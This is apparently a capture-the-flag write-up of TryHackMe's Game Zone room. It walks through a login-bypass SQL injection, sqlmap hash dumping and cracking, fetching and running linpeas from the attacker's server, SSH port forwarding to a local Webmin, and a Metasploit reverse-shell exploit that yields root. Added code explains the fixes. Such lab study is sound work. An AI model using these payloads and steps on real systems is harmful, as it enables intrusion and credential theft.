SQLi and Reverse SSH Tunnelling | Game Zone THM

Game Zone, offered by TryHackMe, is a box that covers a broad spectrum of tasks. It takes participants through SQL injection, password cracking, reverse SSH tunneling, and the use of Metasploit. It’s a solid challenge, offering a good mix of content for those keen to hone their skills.


Insights

  • Web Application Vulnerabilities: SQL injection vulnerability was discovered and exploited in the login form. This emphasizes the importance of securing web applications, as they often present entry points for potential cyber-attacks.
  • Hash Extraction and Cracking: After obtaining a password hash, tools were used to identify its type and then crack it to retrieve the original credentials. This highlights the significance of strong password hashing mechanisms and the potential risks of weak password security.
  • Privilege Escalation Techniques: Using tools like LinPEAS helps in identifying potential paths to elevate privileges. It underscores the importance of system hardening and monitoring to prevent unauthorized escalations.

User Flag

I began with an aggressive scan focusing on the most prevalent ports using Nmap.

└─$ nmap -sC -sV -A 10.10.238.97 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-21 15:56 EDT

The results highlighted that ports 22 and 80 were open for business. With an HTTP service actively running on port 80, the logical next step was to initiate directory discovery, and for that, I turned to gobuster.

└─$ gobuster dir --url http://10.10.238.97 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.238.97
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/29 18:00:33 Starting gobuster in directory enumeration mode
===============================================================

Following the scan initiation, I dove into some hands-on web application exploration. It didn’t take long before I found a login form located at the /index path.

POST /index.php HTTP/1.1
Host: 10.10.238.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Origin: http://10.10.238.97
Connection: close
Referer: http://10.10.238.97/
Cookie: PHPSESSID=h4had2deibkvklgbt6ti1fhap1
Upgrade-Insecure-Requests: 1

username=Admin&password=Pass&x=27&y=3

SQL Injection

I decided to pass the form to Burp Suite and try the Intruder module with an SQL wordlist. The username field turned out to be vulnerable to SQL injection.

Log in: admin' OR 1=1 -- -
Password: pass
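To show why the username field behaved that way, here is an added example (my own, not code from the room or from this write-up) in Python, with an in-memory SQLite table standing in for the site's MySQL users table. login_vulnerable builds the query by string concatenation, so the admin' OR 1=1 -- - input above turns the WHERE clause into a tautology and the trailing comment swallows the password check; login_safe passes the same input as a bound parameter, so the payload is only a literal that matches no row. The table contents, the password and the function names are constructed for the demonstration.

```python
import sqlite3

# Added example, not code from the room or the write-up. An in-memory
# SQLite table stands in for the site's MySQL users table; the row and
# the password are constructed.


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'c0rrect-h0rse')")  # constructed
    conn.commit()
    return conn


def rendered_query(username, password):
    """The exact SQL text the vulnerable login assembles from user input.
    This is what a code reviewer or a query log would reveal."""
    return ("SELECT username FROM users WHERE username = '" + username
            + "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Query text assembled from user input, the pattern behind the login
    bypass. Any row matching the (attacker-controlled) WHERE clause counts
    as a successful login."""
    return conn.execute(rendered_query(username, password)).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with bound parameters: the driver sends the values
    separately from the SQL text, so quotes and '--' in the input are
    data, never syntax."""
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' OR 1=1 -- -"
    print(rendered_query(payload, "pass"))
    print("vulnerable login accepts payload:", login_vulnerable(db, payload, "pass"))
    print("parameterised login accepts payload:", login_safe(db, payload, "pass"))
```

Running the block prints the rendered query, which makes the problem visible at a glance: everything after the injected -- is a comment, so the password clause never executes.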

Diving Deeper with Burp Suite and SQLMap

I went back to Burp Suite to catch the web request once more and saved its contents to a file. With that in hand, I turned to SQLMap, hoping to pinpoint another potential injection point. In this case, it was /portal.php.

POST /portal.php HTTP/1.1

Host: 10.10.240.149
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://10.10.240.149
Connection: close
Referer: http://10.10.240.149/portal.php
Cookie: PHPSESSID=a1jugj0lqpq43du1e5tvrjlf85
Upgrade-Insecure-Requests: 1

searchitem=VULNERABLE

With the information at hand, I proceeded to execute the subsequent command, aiming to extract a hash from the password table.

└─$ sqlmap -r web_req 10.10.240.149 --dbms=mysql --dump

Identifying and Decoding the Hash

Next, I took the extracted hash and input it into tools like CyberChef or hashID. The goal? Determine the specific hashing algorithm employed.

With the type of hash in hand, JohnTheRipper became my tool of choice to decipher it and hopefully reveal some useful credentials.

john crackme --wordlist=/usr/share/wordlists/rockyou.txt --format=********
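As an added example of the identify-then-crack step (mine, not the write-up's; the digest, wordlist and function names are constructed): guess_hash_family applies the length-and-charset heuristic that hashID and CyberChef start with, wordlist_lookup shows that an unsalted fast hash falls to a dictionary in a single pass, and hash_password / verify_password show the salted, iterated PBKDF2 storage that would have made that step impractical. The 600,000 iteration count follows current OWASP guidance for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os

# Added example, not the write-up's own code. SAMPLE_DIGEST, SAMPLE_WORDLIST
# and the function names are constructed for the demonstration.

SAMPLE_WORDLIST = ["password", "letmein", "sunshine1", "qwerty123"]  # constructed
SAMPLE_DIGEST = hashlib.sha256(b"sunshine1").hexdigest()            # constructed

HEX_LENGTH_TO_FAMILY = {
    32: "MD5",      # NTLM and MD4 share this length; hashID lists those too
    40: "SHA-1",
    64: "SHA-256",
    128: "SHA-512",
}


def guess_hash_family(digest_hex):
    """Length-and-charset heuristic, the first check hashID/CyberChef apply.
    Returns the family name, or None for salted/encoded formats and odd lengths."""
    d = digest_hex.strip().lower()
    if not d or any(c not in "0123456789abcdef" for c in d):
        return None
    return HEX_LENGTH_TO_FAMILY.get(len(d))


def wordlist_lookup(digest_hex, wordlist, algo):
    """Dictionary pass over an unsalted hash: one fast digest per candidate,
    which is why rockyou.txt finishes in seconds. Returns the match or None."""
    target = digest_hex.strip().lower()
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target:
            return word
    return None


def hash_password(password, salt=None, iterations=600_000):
    """Storage format that resists the step above: a random per-user salt
    (no shared rainbow tables) and an iterated KDF (600k hashes per
    candidate per user instead of one)."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt/iterations; constant-time compare."""
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print("family:", guess_hash_family(SAMPLE_DIGEST))
    print("recovered:", wordlist_lookup(SAMPLE_DIGEST, SAMPLE_WORDLIST, "sha256"))
    stored = hash_password("sunshine1")
    print("stored form:", stored)
    print("verify ok:", verify_password("sunshine1", stored))
```

The length heuristic is only a starting point: a 64-character hex string could also be a salted SHA-256 or HMAC output, which is why tools report several candidates and john needs the --format hint.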

Using the discovered username and password, we can log into SSH and grab the first flag.

Root Flag

After looking through some files and trying the most common privesc techniques, I used linpeas to speed up the process.

LinPEAS

I sifted through various files and attempted some of the routine privesc methods without much luck. To expedite the process and potentially uncover overlooked paths, I turned to linpeas, a reliable tool known for its thoroughness in such scenarios.

To get things rolling, I configured a local python3 HTTP server on the attacking machine. This would allow for easy file transfers and other interactions between the target and my system.

└─$ python3 -m http.server 5555
Serving HTTP on 0.0.0.0 port 5555 (http://0.0.0.0:5555/) ...

Following that, I employed wget to retrieve the file, targeting the /tmp directory. This directory is commonly used for such operations, as users typically have write permissions here, making it a go-to spot for temporary file storage and operations.

user@gamezone:/tmp$ wget http://10.13.18.79:5555/linpeas
--2021-08-29 23:13:24--  http://10.13.18.79:5555/linpeas
Connecting to 10.13.18.79:5555... connected.
HTTP request sent, awaiting response... 200 OK
Length: 342868 (335K) [application/octet-stream]
Saving to: ‘linpeas’
linpeas                             100%[================================================================>] 334.83K   312KB/s    in 1.1s    
2021-08-29 23:13:25 (312 KB/s) - ‘linpeas’ saved [342868/342868]
user@gamezone:/tmp$ chmod +x linpeas 
user@gamezone:/tmp$ ./linpeas

Make sure to set execute permissions on the file before running it. One of the interesting finds was a service on port 10000 listening on the local interface only. To reach it from our web browser, we need to establish a reverse SSH tunnel.

Understanding the Reverse SSH Tunnel

A reverse SSH tunnel, in essence, is a technique for reaching a service on a remote host that sits behind a barrier such as a firewall (or, as here, that only listens on the loopback address) by carrying the traffic inside an SSH session to that host. What's neat about it is that it lets you open a connection from your local machine that lands on the distant computer as if it were local there. Think of it as a bridge, allowing you to communicate with remote services even when direct access is limited. In the command below, -L 10000:127.0.0.1:10000 makes ssh listen on port 10000 on the attacking machine and forward each connection to it through the session to 127.0.0.1:10000 as seen from the target.

└─$ ssh -L 10000:127.0.0.1:10000 [email protected]

Now, if we enter 127.0.0.1:10000 into the browser, we are directed to a new web page.
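As an added illustration of what that ssh -L command sets up (my own example, not part of the write-up), the Python below implements the same mechanics with plain sockets: a listener accepts connections and relays each one to a target address, propagating half-closes so a request/response exchange finishes cleanly instead of hanging. start_echo_server is a constructed stand-in for the service that was bound to 127.0.0.1:10000 on the target, and all addresses and ports here are constructed so the whole thing runs on one machine; in the real tunnel the listener lives on the attacking machine and the onward connection is made by sshd on the target. That is the defender's lesson from this step: binding a service to loopback hides it from an external Nmap scan, but it is not a security boundary once any account can log in over SSH. For reference, -L binds the listener on the ssh client side as shown here, while -R binds it on the server side.

```python
import socket
import threading

# Added example: a minimal TCP forwarder with the same shape as
# ssh -L <local_port>:<target_host>:<target_port>. Everything runs on one
# machine; the echo service, addresses and ports are constructed.


def _pump(src, dst):
    """Copy bytes from src to dst until src reaches EOF, then half-close dst
    so the peer sees the same EOF. Without this, the far side never learns
    the request is complete and the exchange stalls."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_forwarder(bind_host, bind_port, target_host, target_port):
    """Listen on bind_host:bind_port and relay every accepted connection to
    target_host:target_port. Returns the listening socket; read
    getsockname()[1] for the port when bind_port is 0."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_host, bind_port))
    listener.listen(5)

    def accept_loop():
        while True:
            try:
                client, _ = listener.accept()
            except OSError:  # listener closed
                return
            try:
                upstream = socket.create_connection((target_host, target_port), timeout=5)
                upstream.settimeout(None)  # connect timeout only; idle sessions stay up
            except OSError:
                client.close()
                continue
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener


def start_echo_server():
    """Constructed stand-in for the loopback-only service on the target:
    echoes what it receives and closes once the client half-closes."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind(("127.0.0.1", 0))
    server.listen(5)

    def handle(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def serve():
        while True:
            try:
                conn, _ = server.accept()
            except OSError:
                return
            threading.Thread(target=handle, args=(conn,), daemon=True).start()

    threading.Thread(target=serve, daemon=True).start()
    return server


def round_trip(port, payload):
    """Connect to the forwarder's local port (what the browser does with
    127.0.0.1:10000), send payload, and return the full reply."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    echo = start_echo_server()
    fwd = start_forwarder("127.0.0.1", 0, "127.0.0.1", echo.getsockname()[1])
    print(round_trip(fwd.getsockname()[1], b"GET / HTTP/1.0\r\n\r\n"))
```

The half-close handling in _pump is the part people usually get wrong in hand-rolled relays; ssh does the equivalent for forwarded channels, which is why a browser session through the tunnel behaves exactly like one opened on the target itself.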

It’s surprising, but credential reuse remains a prevalent issue. Sticking to the principle of “try the simplest thing first,” I used the credentials uncovered from our SSH exploration. And sure enough, upon entry, I was greeted with a page displaying the version number for Webmin. It’s a reminder that sometimes, keeping things straightforward can yield valuable results.

Probing with searchsploit

When I input the Webmin version into searchsploit, I stumbled upon a notable result—a Ruby file. From past encounters, I’ve come to recognize that such a file typically suggests a Metasploit module might be available for this specific vulnerability.

└─$ searchsploit 1.580             
------------------------------------ ---------------------------------
 Exploit Title                      |  Path
------------------------------------ ---------------------------------
Webmin X.XXX - '/file/show.cgi' Rem | unix/remote/21851.rb
------------------------------------ ---------------------------------

Once I fired up msfconsole, I tapped into its search functionality. Sure enough, the results confirmed the existence of a relevant module. This hinted at a potential avenue for exploitation using Metasploit’s capabilities.

exploit/unix/webapp/webmin_show_cgi_exec

The last step is to configure the module and run the exploit.

Module options (exploit/unix/webapp/webmin_show_cgi_exec):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  xxxxxxxxxxxxxxx  yes       Webmin Password
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS    127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     10000            yes       The target port (TCP)
   SSL       false            yes       Use SSL
   USERNAME  user             yes       Webmin Username
   VHOST                      no        HTTP server virtual host
Payload options (cmd/unix/reverse):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  tun1             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Configuring for the Final Push

To optimize our chances, it’s essential to adjust a few settings. Ensure you set SSL to false and point RHOSTS to localhost — that’s where our SSH tunnel is anchored. For the payload, I found cmd/unix/reverse to be the most effective.

Executing this will reward us with a root connection. And there, in the /root directory, awaits the flag we’ve been working towards.

Game Zone Summary

In the “Game Zone” challenge from TryHackMe, I was presented with a myriad of tasks to tackle, encompassing SQL injection, password cracking, reverse SSH tunneling, and Metasploit utilization.

I started with an Nmap scan, which highlighted open ports 22 and 80. Intrigued by the HTTP service on port 80, I utilized gobuster for directory discovery. This led to the identification of a login form at the /index path.

Upon testing, the login form’s username field proved vulnerable to SQL injection. With the aid of Burp Suite and the Intruder module, a successful injection was made. I further used SQLMap to target /portal.php, extracting a password hash in the process.

Decoding the extracted hash identified its type, and with the help of JohnTheRipper, the original credentials were revealed. This facilitated SSH login, allowing me to retrieve the user flag.

Linpeas was the tool of choice for potential privilege escalation paths. While using it, I noted a locally running port 10000. A reverse SSH tunnel was then established to communicate with this port. To my astonishment, the same SSH credentials permitted access to a new web page displaying the Webmin version.

Using searchsploit, a vulnerability related to the discovered Webmin version was identified, hinting at a potential Metasploit module. Upon confirmation within the Metasploit framework, I configured the module accordingly. Successful exploitation using this module granted a root connection, and I was able to secure the coveted root flag.

Game Zone was a compelling challenge, effectively blending various aspects of penetration testing. I commend TryHackMe for creating such a comprehensive learning experience.
